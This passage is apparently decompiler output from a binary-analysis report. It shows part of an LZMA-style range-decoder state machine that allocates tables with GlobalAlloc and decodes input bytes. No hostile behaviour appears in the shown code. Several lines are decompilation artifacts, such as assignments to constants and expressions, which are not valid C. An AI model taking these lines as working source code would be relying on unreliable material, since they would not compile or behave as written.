                                                                    											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                    												L10:
                                                                    												if(_t641 == 0) {
                                                                    													L12:
                                                                    													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                    													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                    													goto L15;
                                                                    												} else {
                                                                    													goto L11;
                                                                    												}
                                                                    												do {
                                                                    													L11:
                                                                    													_t641 = _t641 - 1;
                                                                    													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                    												} while (_t641 != 0);
                                                                    												goto L12;
                                                                    											}
                                                                    											L6:
                                                                    											if( *(_t644 - 4) != 0) {
                                                                    												GlobalFree( *(_t644 - 4));
                                                                    											}
                                                                    											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                    											 *(_t644 - 4) = _t538;
                                                                    											if(_t538 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                    												goto L10;
                                                                    											}
                                                                    										case 1:
                                                                    											L13:
                                                                    											__eflags =  *(_t644 - 0x6c);
                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                    												L157:
                                                                    												 *(_t644 - 0x88) = 1;
                                                                    												goto L170;
                                                                    											}
                                                                    											L14:
                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                    											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                    											_t45 = _t644 - 0x48;
                                                                    											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                    											__eflags =  *_t45;
                                                                    											L15:
                                                                    											if( *(_t644 - 0x48) < 4) {
                                                                    												goto L13;
                                                                    											}
                                                                    											L16:
                                                                    											_t550 =  *(_t644 - 0x40);
                                                                    											if(_t550 ==  *(_t644 - 0x74)) {
                                                                    												L20:
                                                                    												 *(_t644 - 0x48) = 5;
                                                                    												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                    												goto L23;
                                                                    											}
                                                                    											L17:
                                                                    											 *(_t644 - 0x74) = _t550;
                                                                    											if( *(_t644 - 8) != 0) {
                                                                    												GlobalFree( *(_t644 - 8));
                                                                    											}
                                                                    											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                    											 *(_t644 - 8) = _t538;
                                                                    											if(_t538 == 0) {
                                                                    												goto L171;
                                                                    											} else {
                                                                    												goto L20;
                                                                    											}
                                                                    										case 2:
                                                                    											L24:
                                                                    											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                    											 *(_t644 - 0x84) = 6;
                                                                    											 *(_t644 - 0x4c) = _t557;
                                                                    											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                    											goto L132;
                                                                    										case 3:
                                                                    											L21:
                                                                    											__eflags =  *(_t644 - 0x6c);
                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                    												L158:
                                                                    												 *(_t644 - 0x88) = 3;
                                                                    												goto L170;
                                                                    											}
                                                                    											L22:
                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                    											_t67 = _t644 - 0x70;
                                                                    											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                    											__eflags =  *_t67;
                                                                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                    											L23:
                                                                    											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                    											if( *(_t644 - 0x48) != 0) {
                                                                    												goto L21;
                                                                    											}
                                                                    											goto L24;
                                                                    										case 4:
                                                                    											L133:
                                                                    											_t559 =  *_t642;
                                                                    											_t626 = _t559 & 0x0000ffff;
                                                                    											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                    											if( *(_t644 - 0xc) >= _t596) {
                                                                    												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                    												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                    												 *(_t644 - 0x40) = 1;
                                                                    												_t560 = _t559 - (_t559 >> 5);
                                                                    												__eflags = _t560;
                                                                    												 *_t642 = _t560;
                                                                    											} else {
                                                                    												 *(_t644 - 0x10) = _t596;
                                                                    												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                    												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                    											}
                                                                    											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                    												goto L139;
                                                                    											} else {
                                                                    												goto L137;
                                                                    											}
                                                                    										case 5:
                                                                    											L137:
                                                                    											if( *(_t644 - 0x6c) == 0) {
                                                                    												L168:
                                                                    												 *(_t644 - 0x88) = 5;
                                                                    												goto L170;
                                                                    											}
                                                                    											L138:
                                                                    											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                    											L139:
                                                                    											_t537 =  *(_t644 - 0x84);
                                                                    											L140:
                                                                    											 *(_t644 - 0x88) = _t537;
                                                                    											goto L1;
                                                                    										case 6:
                                                                    											L25:
                                                                    											__edx = 0;
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												L36:
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x34) = 1;
                                                                    												 *(__ebp - 0x84) = 7;
                                                                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                    												goto L132;
                                                                    											}
                                                                    											L26:
                                                                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                    											__esi =  *(__ebp - 0x60);
                                                                    											__cl = 8;
                                                                    											__cl = 8 -  *(__ebp - 0x3c);
                                                                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                    											__ecx =  *(__ebp - 0x3c);
                                                                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                    											__ecx =  *(__ebp - 4);
                                                                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                    											__eflags =  *(__ebp - 0x38) - 4;
                                                                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                    											if( *(__ebp - 0x38) >= 4) {
                                                                    												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                    												if( *(__ebp - 0x38) >= 0xa) {
                                                                    													_t98 = __ebp - 0x38;
                                                                    													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                    													__eflags =  *_t98;
                                                                    												} else {
                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                    												}
                                                                    											} else {
                                                                    												 *(__ebp - 0x38) = 0;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x34) - __edx;
                                                                    											if( *(__ebp - 0x34) == __edx) {
                                                                    												L35:
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												goto L61;
                                                                    											} else {
                                                                    												L32:
                                                                    												__eax =  *(__ebp - 0x14);
                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                    													__eflags = __eax;
                                                                    												}
                                                                    												__ecx =  *(__ebp - 8);
                                                                    												__ebx = 0;
                                                                    												__ebx = 1;
                                                                    												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                    												goto L41;
                                                                    											}
                                                                    										case 7:
                                                                    											L66:
                                                                    											__eflags =  *(__ebp - 0x40) - 1;
                                                                    											if( *(__ebp - 0x40) != 1) {
                                                                    												L68:
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    												 *(__ebp - 0x80) = 0x16;
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x28);
                                                                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    												__eax = 0;
                                                                    												__eflags =  *(__ebp - 0x38) - 7;
                                                                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    												__al = __al & 0x000000fd;
                                                                    												__eax = (__eflags >= 0) - 1 + 0xa;
                                                                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__eax =  *(__ebp - 4) + 0x664;
                                                                    												__eflags = __eax;
                                                                    												 *(__ebp - 0x58) = __eax;
                                                                    												goto L69;
                                                                    											}
                                                                    											L67:
                                                                    											__eax =  *(__ebp - 4);
                                                                    											__ecx =  *(__ebp - 0x38);
                                                                    											 *(__ebp - 0x84) = 8;
                                                                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                    											goto L132;
                                                                    										case 8:
                                                                    											L70:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 0xa;
                                                                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x38);
                                                                    												__ecx =  *(__ebp - 4);
                                                                    												__eax =  *(__ebp - 0x38) + 0xf;
                                                                    												 *(__ebp - 0x84) = 9;
                                                                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                    											}
                                                                    											goto L132;
                                                                    										case 9:
                                                                    											L73:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												goto L90;
                                                                    											}
                                                                    											L74:
                                                                    											__eflags =  *(__ebp - 0x60);
                                                                    											if( *(__ebp - 0x60) == 0) {
                                                                    												goto L171;
                                                                    											}
                                                                    											L75:
                                                                    											__eax = 0;
                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                    											__eflags = _t259;
                                                                    											0 | _t259 = _t259 + _t259 + 9;
                                                                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                    											goto L76;
                                                                    										case 0xa:
                                                                    											L82:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												L84:
                                                                    												__eax =  *(__ebp - 4);
                                                                    												__ecx =  *(__ebp - 0x38);
                                                                    												 *(__ebp - 0x84) = 0xb;
                                                                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                    												goto L132;
                                                                    											}
                                                                    											L83:
                                                                    											__eax =  *(__ebp - 0x28);
                                                                    											goto L89;
                                                                    										case 0xb:
                                                                    											L85:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												__ecx =  *(__ebp - 0x24);
                                                                    												__eax =  *(__ebp - 0x20);
                                                                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                    											} else {
                                                                    												__eax =  *(__ebp - 0x24);
                                                                    											}
                                                                    											__ecx =  *(__ebp - 0x28);
                                                                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                    											L89:
                                                                    											__ecx =  *(__ebp - 0x2c);
                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                    											L90:
                                                                    											__eax =  *(__ebp - 4);
                                                                    											 *(__ebp - 0x80) = 0x15;
                                                                    											__eax =  *(__ebp - 4) + 0xa68;
                                                                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                    											goto L69;
                                                                    										case 0xc:
                                                                    											L99:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												L164:
                                                                    												 *(__ebp - 0x88) = 0xc;
                                                                    												goto L170;
                                                                    											}
                                                                    											L100:
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t334 = __ebp - 0x70;
                                                                    											 *_t334 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t334;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											__eax =  *(__ebp - 0x2c);
                                                                    											goto L101;
                                                                    										case 0xd:
                                                                    											L37:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												L159:
                                                                    												 *(__ebp - 0x88) = 0xd;
                                                                    												goto L170;
                                                                    											}
                                                                    											L38:
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t122 = __ebp - 0x70;
                                                                    											 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t122;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L39:
                                                                    											__eax =  *(__ebp - 0x40);
                                                                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    												goto L48;
                                                                    											}
                                                                    											L40:
                                                                    											__eflags = __ebx - 0x100;
                                                                    											if(__ebx >= 0x100) {
                                                                    												goto L54;
                                                                    											}
                                                                    											L41:
                                                                    											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    											 *(__ebp - 0x48) = __eax;
                                                                    											__eax = __eax + 1;
                                                                    											__eax = __eax << 8;
                                                                    											__eax = __eax + __ebx;
                                                                    											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    											__ax =  *__esi;
                                                                    											 *(__ebp - 0x54) = __esi;
                                                                    											__edx = __ax & 0x0000ffff;
                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    												__cx = __ax;
                                                                    												 *(__ebp - 0x40) = 1;
                                                                    												__cx = __ax >> 5;
                                                                    												__eflags = __eax;
                                                                    												__ebx = __ebx + __ebx + 1;
                                                                    												 *__esi = __ax;
                                                                    											} else {
                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                    												0x800 = 0x800 - __edx;
                                                                    												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *__esi = __cx;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    												goto L39;
                                                                    											} else {
                                                                    												L45:
                                                                    												goto L37;
                                                                    											}
                                                                    										case 0xe:
                                                                    											L46:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												L160:
                                                                    												 *(__ebp - 0x88) = 0xe;
                                                                    												goto L170;
                                                                    											}
                                                                    											L47:
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t156 = __ebp - 0x70;
                                                                    											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t156;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											while(1) {
                                                                    												L48:
                                                                    												__eflags = __ebx - 0x100;
                                                                    												if(__ebx >= 0x100) {
                                                                    													break;
                                                                    												}
                                                                    												L49:
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												__edx = __ebx + __ebx;
                                                                    												__ecx =  *(__ebp - 0x10);
                                                                    												__esi = __edx + __eax;
                                                                    												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    												__ax =  *__esi;
                                                                    												 *(__ebp - 0x54) = __esi;
                                                                    												__edi = __ax & 0x0000ffff;
                                                                    												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    												if( *(__ebp - 0xc) >= __ecx) {
                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    													__cx = __ax;
                                                                    													_t170 = __edx + 1; // 0x1
                                                                    													__ebx = _t170;
                                                                    													__cx = __ax >> 5;
                                                                    													__eflags = __eax;
                                                                    													 *__esi = __ax;
                                                                    												} else {
                                                                    													 *(__ebp - 0x10) = __ecx;
                                                                    													0x800 = 0x800 - __edi;
                                                                    													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    													__ebx = __ebx + __ebx;
                                                                    													 *__esi = __cx;
                                                                    												}
                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    													continue;
                                                                    												} else {
                                                                    													L53:
                                                                    													goto L46;
                                                                    												}
                                                                    											}
                                                                    											L54:
                                                                    											_t173 = __ebp - 0x34;
                                                                    											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    											__eflags =  *_t173;
                                                                    											goto L55;
                                                                    										case 0xf:
                                                                    											L58:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												L161:
                                                                    												 *(__ebp - 0x88) = 0xf;
                                                                    												goto L170;
                                                                    											}
                                                                    											L59:
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t203 = __ebp - 0x70;
                                                                    											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t203;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											L60:
                                                                    											__eflags = __ebx - 0x100;
                                                                    											if(__ebx >= 0x100) {
                                                                    												L55:
                                                                    												__al =  *(__ebp - 0x44);
                                                                    												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    												goto L56;
                                                                    											}
                                                                    											L61:
                                                                    											__eax =  *(__ebp - 0x58);
                                                                    											__edx = __ebx + __ebx;
                                                                    											__ecx =  *(__ebp - 0x10);
                                                                    											__esi = __edx + __eax;
                                                                    											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    											__ax =  *__esi;
                                                                    											 *(__ebp - 0x54) = __esi;
                                                                    											__edi = __ax & 0x0000ffff;
                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    												__cx = __ax;
                                                                    												_t217 = __edx + 1; // 0x1
                                                                    												__ebx = _t217;
                                                                    												__cx = __ax >> 5;
                                                                    												__eflags = __eax;
                                                                    												 *__esi = __ax;
                                                                    											} else {
                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                    												0x800 = 0x800 - __edi;
                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    												__ebx = __ebx + __ebx;
                                                                    												 *__esi = __cx;
                                                                    											}
                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    											 *(__ebp - 0x44) = __ebx;
                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    												goto L60;
                                                                    											} else {
                                                                    												L65:
                                                                    												goto L58;
                                                                    											}
                                                                    										case 0x10:
                                                                    											L109:
                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                    												L165:
                                                                    												 *(__ebp - 0x88) = 0x10;
                                                                    												goto L170;
                                                                    											}
                                                                    											L110:
                                                                    											__ecx =  *(__ebp - 0x70);
                                                                    											__eax =  *(__ebp - 0xc);
                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											_t365 = __ebp - 0x70;
                                                                    											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                    											__eflags =  *_t365;
                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    											goto L111;
                                                                    										case 0x11:
                                                                    											L69:
                                                                    											__esi =  *(__ebp - 0x58);
                                                                    											 *(__ebp - 0x84) = 0x12;
                                                                    											goto L132;
                                                                    										case 0x12:
                                                                    											L128:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												L131:
                                                                    												__eax =  *(__ebp - 0x58);
                                                                    												 *(__ebp - 0x84) = 0x13;
                                                                    												__esi =  *(__ebp - 0x58) + 2;
                                                                    												L132:
                                                                    												 *(_t644 - 0x54) = _t642;
                                                                    												goto L133;
                                                                    											}
                                                                    											L129:
                                                                    											__eax =  *(__ebp - 0x4c);
                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                    											__eflags = __eax;
                                                                    											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    											goto L130;
                                                                    										case 0x13:
                                                                    											L141:
                                                                    											__eflags =  *(__ebp - 0x40);
                                                                    											if( *(__ebp - 0x40) != 0) {
                                                                    												L143:
                                                                    												_t469 = __ebp - 0x58;
                                                                    												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                    												__eflags =  *_t469;
                                                                    												 *(__ebp - 0x30) = 0x10;
                                                                    												 *(__ebp - 0x40) = 8;
                                                                    												L144:
                                                                    												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                                                    												L145:
                                                                    												 *(_t644 - 0x50) = 1;
                                                                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                    												goto L149;
                                                                    											}
                                                                    											L142:
                                                                    											__eax =  *(__ebp - 0x4c);
                                                                    											__ecx =  *(__ebp - 0x58);
                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                    											 *(__ebp - 0x30) = 8;
                                                                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    											L130:
                                                                    											 *(__ebp - 0x58) = __eax;
                                                                    											 *(__ebp - 0x40) = 3;
                                                                    											goto L144;
                                                                    										case 0x14:
                                                                    											L156:
                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    											__eax =  *(__ebp - 0x80);
                                                                    											while(1) {
                                                                    												L140:
                                                                    												 *(_t644 - 0x88) = _t537;
                                                                    												goto L1;
                                                                    											}
                                                                    										case 0x15:
                                                                    											L91:
                                                                    											__eax = 0;
                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    											__al = __al & 0x000000fd;
                                                                    											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    											goto L120;
                                                                    										case 0x16:
                                                                    											goto L0;
                                                                    										case 0x17:
                                                                    											while(1) {
                                                                    												L145:
                                                                    												 *(_t644 - 0x50) = 1;
                                                                    												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                    												goto L149;
                                                                    											}
                                                                    										case 0x18:
                                                                    											goto L146;
                                                                    										case 0x19:
                                                                    											L94:
                                                                    											__eflags = __ebx - 4;
                                                                    											if(__ebx < 4) {
                                                                    												L98:
                                                                    												 *(__ebp - 0x2c) = __ebx;
                                                                    												L119:
                                                                    												_t393 = __ebp - 0x2c;
                                                                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                    												__eflags =  *_t393;
                                                                    												L120:
                                                                    												__eax =  *(__ebp - 0x2c);
                                                                    												__eflags = __eax;
                                                                    												if(__eax == 0) {
                                                                    													L166:
                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                    													goto L170;
                                                                    												}
                                                                    												L121:
                                                                    												__eflags = __eax -  *(__ebp - 0x60);
                                                                    												if(__eax >  *(__ebp - 0x60)) {
                                                                    													goto L171;
                                                                    												}
                                                                    												L122:
                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                    												__eax =  *(__ebp - 0x30);
                                                                    												_t400 = __ebp - 0x60;
                                                                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                    												__eflags =  *_t400;
                                                                    												goto L123;
                                                                    											}
                                                                    											L95:
